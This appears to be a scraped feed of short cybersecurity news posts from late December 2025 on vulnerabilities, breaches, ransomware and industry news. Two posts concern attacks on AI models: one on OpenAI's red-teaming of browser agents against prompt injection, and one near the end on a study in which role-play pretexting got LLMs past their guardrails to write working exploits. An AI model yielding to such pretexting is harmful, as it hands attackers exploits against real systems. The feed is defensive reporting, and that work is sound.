"🚨 Executives Say Cybersecurity Has Outgrown IT: Risk Now Drives Strategy A Rimini Street global exec survey shows cyber threats are now the top external risk (54%) pushing security into enterprise risk management and continuity planningwhile talent gaps and vendor pressure widen exposure. 43% already outsource cybersecurity (46% considering it) and 35% cite vendor lock-in/forced upgrades as a risk driver. 🕷 Malware: N/A 🎯 Target: Global / Enterprise Leadership (Board C-suite critical sectors) # Category: #CyberRisk #CISO #RiskManagement #SecurityStrategy #Outsourcing #TalentGap"
X Link 2025-12-30T07:19Z [--] followers, [--] engagements
"🚨 Korean Air Employee Data Stolen After Oracle EBS Breach at Catering Supplier KC&D Korean Air says attackers stole data for [-----] current/former employees (including names and bank account numbers) after compromising its former subsidiary and current catering supplier KC&D which has been linked to the wider Oracle E-Business Suite (EBS) exploitation/extortion campaign. The incident underscores vendor concentration risk in aviation and how enterprise app zero-days can rapidly translate into high-impact employee fraud exposure. 🕷 Malware: N/A 🎯 Target: South Korea / Aviation (Employees) #"
X Link 2025-12-30T09:22Z [--] followers, [--] engagements
"🚨 ServiceNow Buys Armis for $7.75B to Build an End-to-End Cyber-Physical Security Platform ServiceNow agreed to acquire Armis in a $7.75B all-cash deal to expand exposure management and cyber-physical security across IT OT and medical devices. The goal is deeper asset visibility and faster risk prioritization via ServiceNows security workflows as AI adoption increases attack surface complexity. 🕷 Malware: N/A 🎯 Target: Global / Enterprise (IT+OT+Medical devices) # Category: #ServiceNow #Armis #MergersAndAcquisitions #CyberPhysicalSecurity #ExposureManagement #OTSecurity #MedDeviceSecurity"
X Link 2025-12-30T09:31Z [--] followers, [--] engagements
"🚨 CISA Loses Key Staffer Behind Pre-Ransomware Warnings Program CISAs Pre-Ransomware Notification Initiative (PRNI)which alerts organizations when ransomware actors are preparing to strikefaces uncertainty after its lead David Stern resigned following a forced reassignment. The program has issued thousands of warnings since [----] and CISA estimates it helped prevent roughly $9B in economic damages so disruption could reduce early-warning coverage for critical sectors. 🕷 Malware: N/A 🎯 Target: USA / Government & Critical Infrastructure # Category: #CISA #Ransomware #ThreatIntel"
X Link 2025-12-30T09:35Z [--] followers, [--] engagements
"🚨 Palo Alto Networks: AI Security Is Really a Cloud Infrastructure Problem A Palo Alto Networks survey says 99% of organizations saw at least one attack on AI systems in the past year and argues most of the real risk sits in the cloud foundations (identity permissions and monitoring) that run AI workloads. It recommends prioritizing identity security and integrating cloud telemetry directly into SOC workflows to reduce AI-driven exposure. 🕷 Malware: N/A 🎯 Target: Global / Enterprise Cloud & AI Workloads # Category: #AISecurity #CloudSecurity #PaloAltoNetworks #IAM #SOC #GenAI"
X Link 2025-12-30T09:35Z [--] followers, [--] engagements
"🚨 How to Operationalize AI in the SOC: [--] Workflows That Actually Benefit The article lays out practical ways to embed AI into SOC operationsdetection engineering threat hunting code/tooling support orchestration design and reportingwhile warning that out-of-the-box AI and unvalidated outputs create fragile unsafe workflows. The key message: narrowly scope AI use cases enforce human review gates for actions and standardize prompts/guardrails so AI outputs are testable and repeatable. 🕷 Malware: N/A 🎯 Target: Global / SOC & Enterprise Security Operations # Category: #SOC #AISecurity"
X Link 2025-12-30T11:10Z [--] followers, [--] engagements
"🚨 70000+ MongoDB Servers Still Vulnerable to MongoBleed (CVE-2025-14847) MongoBleed is a zlib-related unauthenticated memory disclosure flaw that can leak sensitive heap data (credentials tokens keys) from vulnerable MongoDB deployments with large numbers of internet-exposed instances still at risk. The key action is immediate patching to fixed builds (e.g. 8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disabling zlib compression as a temporary mitigation. 🕷 Malware: N/A (Vulnerability: MongoBleed / CVE-2025-14847) 🎯 Target: Global / Internet-Exposed MongoDB # Category: #MongoDB"
X Link 2025-12-30T11:10Z [--] followers, [--] engagements
"🚨 CISA Flags Actively Exploited MongoDB MongoBleed Flaw in KEV CISA added CVE-2025-14847 to the KEV catalog after active exploitation warning it lets unauthenticated attackers read uninitialized heap memory via a Zlib header length-handling inconsistencypotentially leaking credentials/tokens from exposed MongoDB servers. Federal agencies must remediate by Jan [--] [----] (BOD 22-01) making immediate patching/mitigation a priority for all internet-facing deployments. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / MongoDB Servers # Category: #MongoDB #MongoBleed #CVE2025_14847 #KEV"
X Link 2025-12-30T12:15Z [--] followers, [--] engagements
"🚨 [----] Cybersecurity M&A Mega-Deals: [--] Acquisitions Cleared the $1B Mark SecurityWeek tallied 420+ cybersecurity M&A deals in [----] ( $84B disclosed) with eight $1B+ transactions driving nearly $75Bled by Googles $32B Wiz deal and Palo Alto Networks $25B CyberArk buy. The consolidation signals buyers prioritizing cloud identity and data-security platforms as must-have control planes for [----]. 🕷 Malware: N/A 🎯 Target: Global / Cybersecurity Industry (M&A) # Category: #Cybersecurity #MergersAndAcquisitions #MAndA #CloudSecurity #IdentitySecurity #DSPM #OTSecurity #MarketTrends 🔗 URL:"
X Link 2025-12-30T13:15Z [--] followers, [--] engagements
"🚨 LG Unveils Gallery TV to Challenge Samsungs The Frame at CES [----] LG is entering the art TV market with a flush-mount Frame-style Gallery TV built on Mini-LED with a matte/anti-glare screen interchangeable frames and a Gallery+ art subscription to display curated artwork when idle. The move signals intensifying competition in lifestyle TVs where always-on display modes and ecosystem services (art stores apps smart-home integration) are becoming the differentiatorsnot just panel tech. 🕷 Malware: N/A 🎯 Target: Global / Consumer Electronics (Home TV market) # Category: #LG #GalleryTV"
X Link 2025-12-30T15:24Z [--] followers, [--] engagements
"🚨 TCL Note A1 NXTPAPER: Digital Paper Tablet Brings 120Hz Full-Color Paper-Like Reading/Writing TCL announced the Note A1 NXTPAPER combining its NXTPAPER paper-like display tech with a full-color LCD and a 120Hz refresh rate to reduce ghosting while staying eye-comfort focused for long reading and stylus work. Its positioned as a Kindle Scribe/reMarkable alternative with productivity features (stylus + meeting transcription/translation) and is expected to launch via crowdfunding soon. 🕷 Malware: N/A 🎯 Target: Global / Consumer Tech (Tablets e-notes productivity) # Category: #TCL #NXTPAPER"
X Link 2025-12-30T15:29Z [--] followers, [--] engagements
"🚨 Legends Never Die: A Backstage Pass to Broadcoms [----] Cybersecurity Tour Broadcoms Symantec and Carbon Black recap their [----] Legends Never Die conference circuit (e.g. Google Cloud Next RSAC Black Hat/DEF CON) emphasizing AI/ML-driven defense demos partner ecosystem wins and updated threat intel messaging. Its essentially a marketing-driven field report on how theyre positioning enterprise security offerings and AI capabilities heading into [----]. 🕷 Malware: N/A 🎯 Target: Global / Enterprise Security Teams & Channel Partners # Category: #Cybersecurity #ThreatIntel #SOC #AI #XDR"
X Link 2025-12-30T15:31Z [--] followers, [--] engagements
"🚨 Trend Micro Helps INTERPOLs Operation Sentinel Bust Africa-Linked Digital Extortion Networks Trend Micro says its intel mapped 2700+ malicious infrastructures/IPs and detected 43000+ digital extortion email attempts tied to Africa-region senders supporting INTERPOLs Operation Sentinel that led to [---] arrests and $3M recovered. The campaign data shows extortion lures were primarily English/Portuguese and largely targeted victims outside Africa (notably the Americas and Europe) highlighting cross-continental monetization and the need for stronger email controls and takedown coordination. 🕷"
X Link 2025-12-30T15:35Z [--] followers, [--] engagements
"🚨 HoneyMyte (Mustang Panda) Uses Signed Kernel Rootkit to Stealth-Deploy ToneShell Kaspersky reports the HoneyMyte/Mustang Panda cluster using a signed Windows mini-filter driver (ProjectConfiguration.sys) to blind Microsoft Defender and inject the ToneShell backdoor into a decoy svchost process with C2 traffic disguised as fake TLS [---] over TCP/443. This kernel-mode delivery boosts persistence and evasion raising incident-response difficulty for targeted government networks in Myanmar and Thailand. 🕷 Malware: ToneShell (kernel-mode rootkit loader) 🎯 Target: Asia / Government (Myanmar"
X Link 2025-12-30T16:40Z [--] followers, [--] engagements
"🚨 Samsung Previews CES [----] Home Audio: New Q-Series Soundbars + Music Studio Wi-Fi Speakers Samsung is teasing its [----] audio lineup ahead of CES adding refreshed Q-Series soundbars and new Music Studio Wi-Fi speakers aimed at tighter SmartThings/TV integration and more immersive AI-tuned playback. The update reinforces the ecosystem audio trend where speakers and soundbars operate as coordinated endpoints across TVs and smart-home routines. 🕷 Malware: N/A 🎯 Target: Global / Consumer Electronics (Home Audio) # Category: #Samsung #CES2026 #Soundbars #WiFiSpeakers #SmartThings #HomeAudio"
X Link 2025-12-30T16:42Z [--] followers, [--] engagements
"🚨 OpenAI: Prompt Injection May Never Be Solved for Browser Agents Like ChatGPT Atlas OpenAI says it shipped a security update after internal automated red-teaming uncovered a new class of prompt-injection attacks adding an adversarially trained model and stronger safeguards. It now uses an RL-trained automated attacker plus counterfactual rollouts to iterate on multi-step injection chains before they appear in the wild. 🕷 Malware: N/A 🎯 Target: Global / AI Browser Agents (Enterprise workflows: email docs web apps) # Category: #OpenAI #ChatGPT #Atlas #PromptInjection #AgenticAI #AIsecurity"
X Link 2025-12-30T16:44Z [--] followers, [--] engagements
"🚨 Magecart Fake Checkout Surge: 50+ Malicious Scripts Hijack Payment Flows A large-scale Magecart operation is using 50+ modular JavaScript skimmers that detect the victims payment gateway (e.g. Stripe/PayPal/Mollie) and dynamically inject localized fake payment forms to steal card and account data while evading modern defenses. 🕷 Malware: Magecart (malicious web skimmer scripts) 🎯 Target: Global/E-Commerce & Online Payments # Category: #Magecart #Ecommerce #WebSkimming #JavaScript #PaymentFraud #SupplyChain #Infostealer #DigitalSkimmer 🔗 URL: https://gbhackers.com/magecart-campaign/"
X Link 2025-12-30T18:22Z [--] followers, [--] engagements
"🚨 ESET Warns AI-Powered Malware Is Now Operational PromptLock Signals a New Ransomware Era ESET reports that AI-driven malware is no longer theoretical spotlighting PromptLock ransomware that can call LLMs (via the Ollama API) to generate and iteratively fix malicious Lua scripts at runtime undermining signature-based detection. The same report also flags a sharp expansion in ransomware activity and a surge in BYOVD-style EDR-killer tooling increasing the likelihood of fast scalable intrusions across multiple sectors. 🕷 Malware: PromptLock (AI-powered ransomware) 🎯 Target:"
X Link 2025-12-30T18:26Z [--] followers, [--] engagements
"🚨 Critical IBM API Connect Auth Bypass (CVE-2025-13915 CVSS 9.8) A critical authentication bypass in IBM API Connect lets remote attackers gain unauthorized access without credentials impacting versions 10.0.8.010.0.8.5 and 10.0.11.0. Patch immediately (apply IBM iFix/security updates) and if you cant patch yet disable Developer Portal self-service sign-up to reduce exposure. 🕷 Malware: N/A 🎯 Target: Global/Enterprises (API Management IBM API Connect) # Category: #CVE202513915 #IBM #APIConnect #AuthBypass #CriticalVuln #APISecurity #PatchNow #DevSecOps 🔗 URL:"
X Link 2025-12-30T18:26Z [--] followers, [--] engagements
"🚨 CISA Flags Active Exploitation of MongoBleed (CVE-2025-14847) in MongoDB CISA added CVE-2025-14847 to its KEV catalog after real-world exploitation was observed; the flaw stems from zlib-compressed protocol header length handling and can let unauthenticated attackers read uninitialized heap memory potentially leaking credentials tokens or sensitive data from exposed MongoDB servers. 🕷 Malware: N/A 🎯 Target: Global/Database Infrastructure (Internet-facing MongoDB) # Category: #MongoDB #CVE202514847 #MongoBleed #CISA #KEV #Vulnerability #DataLeak #DatabaseSecurity #PatchNow 🔗 URL:"
X Link 2025-12-30T18:33Z [--] followers, [--] engagements
"🚨 Massive Magecart Wave: 50+ Web Skimmers Inject Fake Checkout Pages Researchers report a large Magecart operation using 50+ distinct malicious JavaScript skimmers that fingerprint the victim sites payment flow and dynamically inject localized fake checkout forms to steal card data and credentials while evading detection. The scale and modular design makes this a high-impact e-commerce supply-chain risk especially for sites relying on third-party scripts and tag managers. 🕷 Malware: Magecart (web skimmer JavaScript) 🎯 Target: Global/E-Commerce & Online Payments # Category: #Magecart"
X Link 2025-12-30T20:17Z [--] followers, [--] engagements
"🚨 Coupang Offers $1.17B in Vouchers After Massive 33.7M-Account Data Breach Coupang will issue four vouchers totaling [-----] won ($1.17B aggregate) to [----] million notified account holders starting Jan [--] after a breach that began June [--] [----] and exposed personal data (names email phone addresses some order history) but reportedly not payment or login credentialshighlighting escalating regulatory class-action and trust risk for major consumer platforms. 🕷 Malware: N/A 🎯 Target: South Korea/E-Commerce & Logistics # Category: #DataBreach #Coupang #Korea #Privacy #PII #IncidentResponse"
X Link 2025-12-30T21:18Z [--] followers, [--] engagements
"🚨 Critical IBM API Connect Auth Bypass (CVE-2025-13915) Exposes API Gateways to Remote Takeover IBM warns of an authentication-bypass flaw (CVSS 9.8) that could let unauthenticated remote attackers access IBM API Connect potentially enabling configuration tampering and downstream compromise of managed APIs. Affected versions (10.0.8.010.0.8.5 and 10.0.11.0) should apply IBM iFixes immediately; if patching is delayed disable Developer Portal self-service sign-up as a temporary mitigation. 🕷 Malware: N/A 🎯 Target: Global/Enterprises (API Management IBM API Connect) # Category: #CVE202513915"
X Link 2025-12-30T22:50Z [--] followers, [--] engagements
"🚨 Critical SmarterMail Flaw Lets Unauthenticated Attackers Upload Files and Potentially Achieve RCE CVE-2025-52691 (CVSS 10.0) allows unauthenticated arbitrary file upload to any location on SmarterMail servers which can be chained into remote code execution and full mail server takeover. SmarterTools says builds before [----] are affected and urges upgrading to Build 9413+ immediatelyespecially for internet-facing mail servers. 🕷 Malware: N/A 🎯 Target: Global/Email Infrastructure (SmarterMail deployments) # Category: #CVE202552691 #SmarterMail #RCE #ArbitraryFileUpload #EmailSecurity"
X Link 2025-12-30T22:52Z [--] followers, [---] engagements
"🚨 CISA Flags Actively Exploited MongoBleed Bug in MongoDB Server (CVE-2025-14847) CVE-2025-14847 is a zlib-compressed protocol header length-handling flaw that lets unauthenticated attackers remotely read uninitialized heap memory potentially leaking credentials session tokens or encryption keys from exposed MongoDB servers. CISA added it to the KEV catalog on Dec [--] [----] and set a Jan [--] [----] remediation deadlinemaking urgent patching and credential rotation a priority for any internet-facing instances. 🕷 Malware: N/A 🎯 Target: Global/Database Infrastructure (Internet-facing MongoDB) #"
X Link 2025-12-30T22:54Z [--] followers, [--] engagements
"🚨 PoC Released for MongoBleed: 74K+ Exposed MongoDB Servers Still Unpatched A public proof-of-concept for CVE-2025-14847 (MongoBleed) is driving urgency as Shadowserver reports [-----] internet-exposed MongoDB instances still running vulnerable versions. The bug enables unauthenticated heap-memory disclosure via MongoDBs zlib-compressed protocol handling risking leakage of sensitive in-memory data unless servers are urgently patched or zlib compression is disabled as a temporary mitigation. 🕷 Malware: N/A 🎯 Target: Global/Database Infrastructure (Internet-exposed MongoDB) # Category:"
X Link 2025-12-30T22:59Z [--] followers, [---] engagements
"🚨 Ex-Coupang Insider Tosses MacBook in River to Destroy Evidence After Massive Data Breach A former Coupang employee allegedly used a stolen security key to access customer records then smashed and dumped a MacBook Air weighted with bricks to erase tracesbut investigators recovered the device and tied it to the suspect via serial number/iCloud. The case underscores how insider access + poor key controls can drive mega-breaches and how forensics can still reconstruct activity even after attempted physical destruction. 🕷 Malware: N/A 🎯 Target: South Korea/E-Commerce & Consumer Data #"
X Link 2025-12-30T23:01Z [--] followers, [--] engagements
"🚨 Critical 0-Day Root RCE in XSpeeder Devices Exposes 70000+ Hosts CVE-2025-54322 is an unauthenticated root RCE in XSpeeder SXZOS devices where a web-auth component uses unsafe eval() on base64-decoded query input enabling one-request command execution and rapid perimeter compromise. With 70K internet-exposed systems and an unresponsive vendor defenders should urgently isolate/ACL these devices and hunt for web-shell-like artifacts and suspicious GET-based payload attempts. 🕷 Malware: N/A 🎯 Target: Global/Industrial & Branch Networking (XSpeeder SXZOS) # Category: #ZeroDay #RCE"
X Link 2025-12-30T23:07Z [--] followers, [--] engagements
"🚨 Logitech Zone Wireless [--] ES Review: Business Headset Built to Tame Noisy Open Offices Logitechs Zone Wireless [--] ES is positioned as an ANC-forward headset for clearer enterprise calls in loud environments improving meeting confidentiality and voice intelligibility. The security tradeoff is added endpoint surface (Bluetooth/dongle firmware and UC integrations) so it should be managed like any other corporate peripheral (updates device controls and policy). 🕷 Malware: N/A 🎯 Target: Global/Enterprise (Unified Communications & Open Office) # Category: #Logitech #Headset #ANC"
X Link 2025-12-31T02:40Z [--] followers, [--] engagements
"🚨 Defenders Falling Behind: Threat-Led Data Shows Attackers Evolve Faster Than Coverage Tidal Cybers [----] Threat-Led Defense Report finds adversaries rapidly shifting TTP execution (cloud/SaaS abuse social engineering resurgence ransomware fragmentation and broader zero-day use) creating procedure-level blind spots where controls miss real intrusions even when the technique is known. 🕷 Malware: N/A 🎯 Target: Global/Multisector # Category: #ThreatIntel #ThreatLedDefense #TTPs #MITREATTACK #Ransomware #SocialEngineering #ZeroDay #SaaS #CloudSecurity #TidalCyber 🔗 URL:"
X Link 2025-12-31T06:45Z [--] followers, [--] engagements
"🚨 AI-Enhanced InternalWhisper Crypter Markets FUD Evasion Against Windows Defender A new dark-web crypter/loader called InternalWhisper x ImpactSolutions claims an AI-driven metamorphic engine that rewrites 99% of code per build producing signature-less binaries while using AES-256 runtime encryption and stealth loaders (direct syscalls process hollowing signed-binary sideloading) to evade AV/EDRreducing the effectiveness of static detection and accelerating commodity malware deployment. 🕷 Malware: InternalWhisper x ImpactSolutions (AI-enhanced crypter/loader) 🎯 Target: Global/Windows"
X Link 2025-12-31T06:47Z [--] followers, [--] engagements
"🚨 AdaptixC2 v1.0 Ships Major Tunnel + UI Upgrades Boosting C2 Operator Speed AdaptixC2 v1.0 overhauls SOCKS4/5 tunneling to be RFC-compliant adds IPv6 support and improves client responsiveness via async execution/text batchingmaking port-scans and pivoting more reliable and faster. It also adds remote shell/SSH-like terminal tabs plus new BOFs (LDAP DCSync nbtscan runas) and introduces breaking DB changes which matters because better legit red team tooling is routinely repurposed by real attackers. 🕷 Malware: AdaptixC2 (C2 framework) 🎯 Target: Global/Organizations Monitoring"
X Link 2025-12-31T06:49Z [--] followers, [--] engagements
"🚨 AdaptixC2 v1.0 Released With Faster More Reliable Tunneling and UI Upgrades AdaptixC2s latest release improves SOCKS4/5 tunneling (RFC compliance) adds IPv6 support and boosts responsiveness via async client/server operations and text batching to prevent UI freezes. It also introduces a new profile system with autosave updated session/listener management and database-size controls that defenders should account for when hunting C2 activity. 🕷 Malware: AdaptixC2 (C2 framework) 🎯 Target: Global/Red Teams & Post-Exploitation Operations # Category: #AdaptixC2 #C2 #PostExploitation #RedTeam"
X Link 2025-12-31T07:56Z [--] followers, [--] engagements
"🚨 Open-Source AdaptixC2 v1.0 Launches With Faster SOCKS Tunnels and New BOFs AdaptixC2s v1.0 release improves SOCKS4/5 tunneling stability adds IPv6 support and introduces UI/workflow upgrades (async execution terminal tabs) plus new Beacon Object Files like LDAP and DCSyncfeatures that can materially increase attacker/operator efficiency if abused outside legitimate red teaming. 🕷 Malware: AdaptixC2 (C2 framework) 🎯 Target: Global/Organizations Defending Against Post-Exploitation C2 # Category: #AdaptixC2 #C2 #RedTeam #PostExploitation #SOCKS5 #IPv6 #BOF #ThreatHunting 🔗 URL:"
X Link 2025-12-31T07:58Z [--] followers, [--] engagements
"🚨 Dark-Web InternalWhisper AI Crypter Claims FUD Evasion by Metamorphic Rewrites A threat actor is advertising InternalWhisper x ImpactSolutions an AI-enhanced metamorphic crypter that claims to generate signature-free builds by rewriting code per build encrypting payloads (AES-256) and using in-memory execution plus techniques like direct syscalls/process hollowing and signed-binary sideloading. If real it accelerates commodity malware at scale by degrading static detection and pushing defenders toward behavioral/telemetry-driven controls. 🕷 Malware: InternalWhisper x ImpactSolutions"
X Link 2025-12-31T08:00Z [--] followers, [--] engagements
"🚨 Critical Apache StreamPipes Flaw Lets Users Hijack Admin Accounts (CVE-2025-47411) A privilege-escalation bug in Apache StreamPipes (0.69.00.97.0) allows any authenticated non-admin to manipulate JWT/token user identity (e.g. swapping their username to an existing admin) and gain full administrative control enabling data access/tampering and pipeline compromise; upgrade to 0.98.0 immediately. 🕷 Malware: N/A 🎯 Target: Global/Data Streaming & Analytics Platforms (Apache StreamPipes deployments) # Category: #Apache #StreamPipes #CVE202547411 #PrivilegeEscalation #JWT #Vulnerability"
X Link 2025-12-31T08:30Z [--] followers, [--] engagements
"🚨 Critical Apache StreamPipes Bug Lets Low-Privilege Users Hijack Admin Control CVE-2025-47411 impacts Apache StreamPipes 0.69.00.97.0 allowing any authenticated non-admin to manipulate JWT/user-ID handling to impersonate an existing administrator and take over the platform. Upgrade to 0.98.0 immediately to prevent full pipeline/data tampering and backdoor account creation. 🕷 Malware: N/A 🎯 Target: Global/Data Streaming & Analytics (Apache StreamPipes deployments) # Category: #Apache #StreamPipes #CVE202547411 #PrivilegeEscalation #JWT #Vulnerability #PatchNow #DataSecurity 🔗 URL:"
X Link 2025-12-31T09:03Z [--] followers, [--] engagements
"🚨 MongoBleed Exploitation Hotspots: U.S. China and EU Lead Global Exposure MongoBleed (CVE-2025-14847) is a pre-auth zlib compression flaw in MongoDB that lets attackers remotely leak uninitialized process memory (e.g. credentials/tokens) from unpatched servers with large concentrations of exposed instances in China and the U.S. The bug is already being exploited prompting CISA KEV inclusion and rapid patching/mitigation pressure across cloud and hosting providers. 🕷 Malware: N/A 🎯 Target: Global/Database Infrastructure (US China EU-heavy exposure) # Category: #MongoDB #MongoBleed"
X Link 2025-12-31T09:33Z [--] followers, [--] engagements
"🚨 Mapping the Next Cold War: Why US Strategy on China and Russia Must Get Specific WIRED argues the US has drifted without a coherent grand strategy for great-power competition with China and Russia and that treating today as a simple Cold War analogy obscures key differences like economic interdependence and the rise of nonaligned mid-powers. 🕷 Malware: N/A 🎯 Target: Global/Geopolitics () # Category: #Geopolitics #NationalSecurity #ColdWar #China #Russia #USPolicy #CyberPolicy 🔗 URL: https://www.wired.com/story/discovering-the-dimensions-of-a-new-cold-war/"
X Link 2025-12-31T10:36Z [--] followers, [--] engagements
"🚨 NeuroSploit v2: AI-Powered Pentesting Framework Using GPT/Claude/Gemini/Ollama NeuroSploit v2 is a modular GitHub-hosted framework that uses specialized LLM agents (red team bug bounty malware analyst blue team) and integrates tools like Nmap Metasploit Nuclei and SQLMap to accelerate recon and vulnerability analysis. Its main risk is operational: it can compress high-skill workflows into repeatable playbooks so defenders should expect faster time-to-exploit and prioritize behavioral detection and strict tool/use governance. 🕷 Malware: NeuroSploit v2 (tool) 🎯 Target: Global/Offensive"
X Link 2025-12-31T11:49Z [--] followers, [--] engagements
"🚨 LinkedIn Job Scams Surge Globally: Fake Recruiters Monetize Jobseekers Desperation Fraudsters posing as employers on LinkedIn persuade applicants to pay fees (background checks onboarding training visa processing) with tactics varying by region and often escalating into credential theft or identity-fraud exposure. The bigger risk is organizational: stolen LinkedIn accounts and harvested personal data enable highly believable BEC-style impersonation and targeted spear-phishing into real companies. 🕷 Malware: N/A 🎯 Target: Global/Jobseekers & Recruiting (Social Media Platforms) # Category:"
X Link 2025-12-31T12:50Z [--] followers, [--] engagements
"🚨 Shai-Hulud Supply Chain Worm Fueled $8.5M Trust Wallet Chrome Extension Heist Trust Wallet says Shai-Hulud [---] leaked its developer GitHub secrets letting attackers use a stolen Chrome Web Store API key to publish a backdoored Trust Wallet extension (v2.68) that pulled malicious code from an attacker domain and drained [----] wallets ($8.5M) between Dec 2426highlighting how npm/GitHub credential theft can directly translate into consumer crypto theft via compromised release pipelines. 🕷 Malware: Shai-Hulud [---] (self-replicating npm supply-chain worm) + backdoored Trust Wallet Chrome"
X Link 2025-12-31T12:52Z [--] followers, [--] engagements
"🚨 Cl0p Leaks [-----] Korean Air Employee Records After Third-Party ERP Breach Cl0p claims it compromised Korean Airs catering partner KC&D Service by exploiting an Oracle E-Business Suite zero-day (CVE-2025-61882) then leaked employee names and bank account numbers from the partners ERP server (hundreds of GB posted after alleged ransom refusal). This is high-risk for payroll fraud and targeted phishing and it highlights third-party ERP weak links as a repeatable intrusion path. 🕷 Malware: Cl0p (ransomware/extortion group) 🎯 Target: South Korea/Aviation (employee PII via third-party"
X Link 2025-12-31T12:54Z [--] followers, [---] engagements
"🚨 [----] Cybersecurity Forecast: AI Arms Race and Autonomous Self-Learning Malware Dark Reading predicts [----] will see attackers scale AI-driven phishing deepfakes and automated vuln exploitation while defenders race to deploy agentic automation for detection and containment. It warns of emerging malware autonomy (self-learning tactic-shifting worms) and accelerating vendor consolidation/platformization that could reshape how security teams buy and operate tooling. 🕷 Malware: N/A 🎯 Target: Global/Multisector # Category: #CyberPredictions #AI #AgenticAI #AutonomousMalware #ThreatLandscape"
X Link 2025-12-31T12:56Z [--] followers, [--] engagements
"🚨 Qilin Ransomware Claims New Breaches Across Israel and the U.S. The Qilin ransomware group alleges it breached three organizationsTaLachaim (Israel stem cell preservation/medical services) Quasar Data Center (Houston colocation/cloud/BCP) and Z-Tronix (California manufacturing)signaling continued multi-sector extortion pressure and potential data-theft risk for healthcare and critical IT service providers. 🕷 Malware: Qilin Ransomware 🎯 Target: Israel/Healthcare + USA/Cloud & Manufacturing # Category: #Ransomware #Qilin #DataBreach #Israel #USA #Healthcare #DataCenter #Manufacturing"
X Link 2025-12-31T12:59Z [--] followers, [--] engagements
"🚨 Threat Actors Manipulate LLMs to Automate Exploit Creation Against Enterprise Apps A new study shows attackers can social-engineer mainstream LLMs (e.g. GPT-4o/Claude) using structured pretexting (Role-play Scenario Action) to bypass safety guardrails and reliably generate functional exploit scriptsreportedly achieving 100% success in weaponizing Odoo ERP CVEs. This collapses the traditional skill barrier for exploitation and forces defenders to assume faster time-to-exploit even from low-skill actors. 🕷 Malware: N/A 🎯 Target: Global/Enterprise Software (Odoo ERP & open-source stacks) #"
X Link 2025-12-31T14:01Z [--] followers, [--] engagements
"🚨 APT36 Abuses PDF.lnk Shortcuts to Drop In-Memory .NET RAT on Indian Government Targets APT36 (Transparent Tribe) is sending spear-phishing ZIP lures (Online JLPT Exam Dec containing a fake PDF that is actually a large .pdf.lnk; opening it launches mshta.exe to pull a remote HTA (innlive.in) that Base64+XOR decodes ReadOnly/WriteOnly blocks and loads an encrypted RAT DLL directly in memory while displaying a real PDF as a decoy. 🕷 Malware: APT36 in-memory .NET RAT (DLL) 🎯 Target: India/Government & Strategic Entities # Category: #APT36 #TransparentTribe #SpearPhishing #LNK #MSHTA #HTA"
X Link 2025-12-31T14:03Z [--] followers, [--] engagements
"🚨 AI Skepticism Surges as ROI Disappoints and Bubble Fears Grow As AI stock momentum cools and many enterprises report weak returns from GenAI pilots prominent critics argue vendors overpromised while real-world reliability and cost issues persist. In cybersecurity AI can accelerate vulnerability discovery/patching but measurable benefits remain uneven and AI-washing concerns are rising. 🕷 Malware: N/A 🎯 Target: Global/Enterprises & Cybersecurity Operations # Category: #AI #GenAI #Cybersecurity #AIROI #AIBubble #AIWashing #SecurityAutomation #RiskManagement 🔗 URL:"
X Link 2025-12-31T15:04Z [--] followers, [--] engagements
"🚨 IBM API Connect Critical Auth Bypass (CVE-2025-13915) Puts Exposed API Gateways at Risk IBM disclosed a critical authentication bypass (CVSS 9.8) in API Connect that can let remote attackers gain unauthorized access on affected versions (10.0.8.010.0.8.5 10.0.11.0). Apply IBMs interim fix from Fix Central immediately; if you cant disable Developer Portal self-service sign-up to reduce exposure. 🕷 Malware: N/A 🎯 Target: Global/Enterprises (API Management IBM API Connect) # Category: #CVE202513915 #IBM #APIConnect #AuthBypass #APISecurity #CriticalVuln #PatchNow #DevSecOps 🔗 URL:"
X Link 2025-12-31T15:08Z [--] followers, [--] engagements
"🚨 When the Cloud Goes Down Your Smart Devices Go Dumb Dark Reading highlights how mounting cloud outages (AWS Cloudflare Azure) are increasingly disrupting IoT-dependent daily lifesmart homes alarms thermostats and routinesbecause many devices cant function without constant cloud connectivity. A mid-October AWS outage that lasted nearly [--] hours underscored the risk of centralized dependencies making offline/fail-safe modes and resilience engineering a security and safety priority. 🕷 Malware: N/A 🎯 Target: Global/IoT & Smart Home Ecosystem # Category: #IoT #CloudOutage #Resilience"
X Link 2025-12-31T15:12Z [--] followers, [--] engagements
"🚨 IBM API Connect Critical Auth Bypass (CVE-2025-13915 CVSS 9.8) A critical authentication-bypass flaw in IBM API Connect lets unauthenticated attackers gain unauthorized access on affected versions (10.0.8.010.0.8.5 and 10.0.11.0) risking API gateway takeover and downstream compromise of managed APIs. Patch immediately using IBMs interim fixes; if patching is delayed disable Developer Portal self-service sign-up to reduce exposure. 🕷 Malware: N/A 🎯 Target: Global/Enterprises (API Management IBM API Connect) # Category: #CVE202513915 #IBM #APIConnect #AuthBypass #CriticalVuln #APISecurity"
X Link 2025-12-31T15:15Z [--] followers, [--] engagements
"🚨 RondoDox Botnet Exploits React2Shell (CVE-2025-55182) to Breach Next.js Servers CloudSEK reports RondoDox began scanning for vulnerable Next.js hosts on Dec [--] and started deploying payloads days later chaining single-request unauthenticated RCE into a botnet loader/health-checker a cryptominer and a Mirai variant while also removing competing malware and enforcing persistence via cron. 🕷 Malware: RondoDox (botnet) + Mirai variant + Coinminer 🎯 Target: Global/Next.js Web Servers + IoT (routers and connected devices) # Category: #RondoDox #React2Shell #CVE202555182 #Nextjs #RCE #Botnet"
X Link 2025-12-31T15:41Z [--] followers, [---] engagements
"🚨 Singapore CSA Warns of Maximum-Severity SmarterMail RCE Flaw (CVE-2025-52691) CSA issued an alert for CVE-2025-52691 (CVSS 10.0) where an unauthenticated attacker can upload arbitrary files to the mail server and potentially achieve remote code execution; affected SmarterMail Build [----] and earlier should be upgraded to Build [----] immediately. 🕷 Malware: N/A 🎯 Target: Singapore/Email Infrastructure (SmarterMail deployments) # Category: #CVE202552691 #SmarterMail #RCE #FileUpload #EmailSecurity #Vulnerability #PatchNow #CSA 🔗 URL:"
X Link 2025-12-31T15:58Z [--] followers, [---] engagements
